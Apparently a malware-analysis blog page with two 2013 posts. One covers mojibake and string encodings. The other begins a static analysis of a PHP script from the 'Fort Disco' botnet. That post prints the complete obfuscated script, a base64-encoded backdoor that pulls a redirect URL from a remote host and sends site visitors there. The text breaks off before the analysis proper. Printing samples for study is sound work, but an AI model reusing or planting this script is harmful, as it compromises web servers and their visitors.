20 August 2013

Mojibaked Malware: Reading Strings Like Tarot Cards

One notable side effect to working in intrusions and malware analysis is the common and frustrating exposure to text in a foreign language. While many would argue the world was much better when text fit within a one-byte space, dwindling RAM and hard drive costs allowed us the extravagant expense of using TWO bytes to represent each character. The world has yet to recover from the shock of this great invention and modern programmers cry themselves to sleep while fighting with Unicode strings.

For a malware analyst, this typically comes about while analyzing code that's beyond the standard trojan, which typically contains no output. Analyzing C2 clients (servers in other contexts) and decoy documents require being able to identify the correct code page for strings so that they appear correctly, can be attributed to a language, and can then be translated.

ASCII is the range of bytes from 0-255, which occupy one byte of storage. UTF-8 extends upon this by using single-byte where possible, but also allowing variable-length bytes that are mathematically calculated to determine the correct byte to use. If you see a string of text that looks like ASCII, but then randomly contains unknown characters, it is likely UTF-8, such as:

C:\users\brian\樿鱼\malware.pdb

Code pages, UTF-16, and even UTF-32, provide additional challenges by providing little context to the data involved. However, I hope that by this point in 2013 we don't need to continually harp on what Unicode is...

For most analysts, their exposure to Unicode is being confronted with unknown text, and then trying to figure out how to get it back into its original language. This text, when illegible, is known as mojibake, a Japanese term for "writing that changes". The data is correct, and it does mean something to someone, but the wrong encoding is being applied. This results in text that looks, well... wrong.

Most analysts have gotten into the habit of searching for unknown characters then guessing which code page or encoding to apply until they produce something that looks legible. This does eventually work, but is a clumsy science. We all have our favorites to try: GB2312, Big5, Cyrillic, 8859-2, etc. But, let's just keep this short and sweet and show you a tool that your peers likely already know about but forgot to show you.

10 August 2013

How To: Static analysis of encoded PHP scripts

This week, Steve Ragan of CSO Online posted an article on a PHP-based botnet named by Arbor Networks as Fort Disco. As part of his analysis, Ragan posted an oddly obfuscated PHP script for others to tinker with, shown below:

<? $GLOBALS['_584730172_']=Array(base64_decode('ZXJy' .'b' .'3JfcmVw' .'b' .'3J0aW5n'),base64_decode('c' .'2V0X3RpbWV' .'fbGl' .'taXQ' .'='),base64_decode('' .'ZG' .'Vma' .'W' .'5l'),base64_decode('' .'ZGlyb' .'mFtZQ=='),base64_decode('ZGVm' .'aW5l'),base64_decode('' .'d' .'W5saW5r'),base64_decode('Zml' .'sZ' .'V9le' .'G' .'lzdHM='),base64_decode('dG91Y2' .'g='),base64_decode('aXNfd3J' .'p' .'dGFibGU='),base64_decode('dHJ' .'p' .'bQ=='),base64_decode('ZmlsZ' .'V9nZXRf' .'Y29udGVud' .'HM='),base64_decode('dW5s' .'aW5r'),base64_decode('Zm' .'lsZ' .'V9nZXRf' .'Y2' .'9u' .'dGVudHM='),base64_decode('d' .'W5' .'saW5r'),base64_decode('cH' .'JlZ19' .'tYX' .'Rj' .'aA=='),base64_decode('aW1wb' .'G9kZ' .'Q=='),base64_decode('cHJlZ19t' .'YXRja' .'A=='),base64_decode('a' .'W1w' .'bG9k' .'Z' .'Q=='),base64_decode('Zml' .'s' .'ZV' .'9nZXRfY' .'29' .'udGV' .'udH' .'M='),base64_decode('Z' .'m9w' .'ZW4='),base64_decode('' .'ZmxvY' .'2' .'s' .'='),base64_decode('ZnB1' .'dH' .'M='),base64_decode('Zmx' .'vY' .'2s' .'='),base64_decode('Zm' .'Nsb3' .'Nl'),base64_decode('Z' .'mlsZV9leG' .'lzdH' .'M='),base64_decode('dW5zZX' .'JpYWx' .'pemU='),base64_decode('Z' .'mlsZV9nZXRfY29udGVu' .'dHM='),base64_decode('dGlt' .'ZQ' .'=' .'='),base64_decode('Zm' .'ls' .'Z' .'V9n' .'ZX' .'RfY29' .'ud' .'GVu' .'dHM='),base64_decode('d' .'GltZ' .'Q=='),base64_decode('Zm9w' .'ZW4='),base64_decode('Zmx' .'vY2s='),base64_decode('' .'ZnB1dHM='),base64_decode('c2VyaWFsaX' .'pl'),base64_decode('Zm' .'xvY2s='),base64_decode('ZmNsb' .'3N' .'l'),base64_decode('c' .'3Vic3Ry'),base64_decode('' .'a' .'GVhZGVy'),base64_decode('aGVhZGV' .'y')); ?><? function _1348942592($i){$a=Array('aHR0cDovL2dheWxlZWNoZXIuY29tOjgx','cXdlMTIz','cXdlMTIz','MTIzcXdl','Uk9PVA==','Lw==','TE9H','b2xvbG8udHh0','L2lmcmFtZS50eHQ=','dGVzdA==','d29yaw==','Tk8gV09SSywgTk9UIEdFVCBVUkw=','Tk8gV09SSywgTk9UIFdSSVRJQkxF','YWFh','YWFh','YWFh','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','YmJi','YmJi','Y2Nj','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','TnVsbCBjb3VudCBvaw==','RVJST1IgbnVsbCBjb3VudCgo','SFRUUF9VU0VSX0FHRU5U','TVNJRQ==','RmlyZWZveA==','T3BlcmE=','V2luZG93cw==','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','dw==','L2lmcmFtZTIudHh0','aHR0cDovL3lhLnJ1Lw==','c2V0dGluZ3MuanNvbg==','c2V0dGluZ3MuanNvbg==','bGFzdA==','dXJs','bGFzdA==','dXJs','bGFzdA==','c2V0dGluZ3MuanNvbg==','dw==','dXJs','dXJs','aHR0cA==','aHR0cDovLw==','Lw==','SFRUUC8xLjEgNDA0IE5vdCBGb3VuZA==');return base64_decode($a[$i]);} ?><?php $GLOBALS['_584730172_'][0](round(0));$GLOBALS['_584730172_'][1](round(0));$_0=_1348942592(0);if(isset($_GET[_1348942592(1)])AND $_GET[_1348942592(2)]==_1348942592(3)){$GLOBALS['_584730172_'][2](_1348942592(4),$GLOBALS['_584730172_'][3](__FILE__) ._1348942592(5));$GLOBALS['_584730172_'][4](_1348942592(6),ROOT ._1348942592(7));@$GLOBALS['_584730172_'][5](LOG);if(!$GLOBALS['_584730172_'][6](LOG)){@$GLOBALS['_584730172_'][7](LOG);if($GLOBALS['_584730172_'][8](LOG)AND $GLOBALS['_584730172_'][9]($GLOBALS['_584730172_'][10]($_0 ._1348942592(8)))==_1348942592(9)){@$GLOBALS['_584730172_'][11](LOG);echo _1348942592(10);}else{echo _1348942592(11);}}else{echo _1348942592(12);}exit;}if(isset($_GET[_1348942592(13)])AND $_GET[_1348942592(14)]== _1348942592(15)){$_1=$GLOBALS['_584730172_'][12]($_SERVER[_1348942592(16)] ._1348942592(17));echo $_1;exit;}if(isset($_GET[_1348942592(18)])AND $_GET[_1348942592(19)]== _1348942592(20)){if($GLOBALS['_584730172_'][13]($_SERVER[_1348942592(21)] ._1348942592(22))){echo _1348942592(23);}else{echo _1348942592(24);}exit;}if(!empty($_SERVER[_1348942592(25)])){$_2=array(_1348942592(26),_1348942592(27),_1348942592(28));$_3=array(_1348942592(29));if($GLOBALS['_584730172_'][14](_1348942592(30) .$GLOBALS['_584730172_'][15](_1348942592(31),$_2) ._1348942592(32),$_SERVER[_1348942592(33)])){if($GLOBALS['_584730172_'][16](_1348942592(34) .$GLOBALS['_584730172_'][17](_1348942592(35),$_3) ._1348942592(36),$_SERVER[_1348942592(37)])){$_4=@$GLOBALS['_584730172_'][18]($_SERVER[_1348942592(38)] ._1348942592(39));if($_4 == _1348942592(40)or $_4 == false)$_4=round(0);$_5=@$GLOBALS['_584730172_'][19]($_SERVER[_1348942592(41)] ._1348942592(42),_1348942592(43));@$GLOBALS['_584730172_'][20]($_5,LOCK_EX);@$GLOBALS['_584730172_'][21]($_5,$_4+round(0+1));@$GLOBALS['_584730172_'][22]($_5,LOCK_UN);@$GLOBALS['_584730172_'][23]($_5);$_6=$_0 ._1348942592(44);$_7=round(0+300);$_8=_1348942592(45);if(!$_6)exit();$_9=$GLOBALS['_584730172_'][24](_1348942592(46))?$GLOBALS['_584730172_'][25]($GLOBALS['_584730172_'][26](_1348942592(47))):array(_1348942592(48)=>round(0),_1348942592(49)=>$_8);if($_9[_1348942592(50)]<$GLOBALS['_584730172_'][27]()-$_7){if($_9[_1348942592(51)]=$GLOBALS['_584730172_'][28]($_6)){$_9[_1348942592(52)]=$GLOBALS['_584730172_'][29]();$_10=$GLOBALS['_584730172_'][30](_1348942592(53),_1348942592(54));$GLOBALS['_584730172_'][31]($_10,LOCK_EX);$GLOBALS['_584730172_'][32]($_10,$GLOBALS['_584730172_'][33]($_9));$GLOBALS['_584730172_'][34]($_10,LOCK_UN);$GLOBALS['_584730172_'][35]($_10);}}$_11=$_9[_1348942592(55)]?$_9[_1348942592(56)]:$_8;if($GLOBALS['_584730172_'][36]($_11,round(0),round(0+1+1+1+1))!= _1348942592(57))$_11=_1348942592(58) .$_11 ._1348942592(59);$GLOBALS['_584730172_'][37]("Location: $_11");exit;}}}$GLOBALS['_584730172_'][38](_1348942592(60)); ?>

As a fan of obfuscation, this clearly piqued my interest. The initial question was what was contained within all of the Base64 sections, but let's examine this holistically.  At a high level view, there are three distinct sections to this code block, with the beginning of each underlined in the code above. Each can also be identified as beginning with "<?".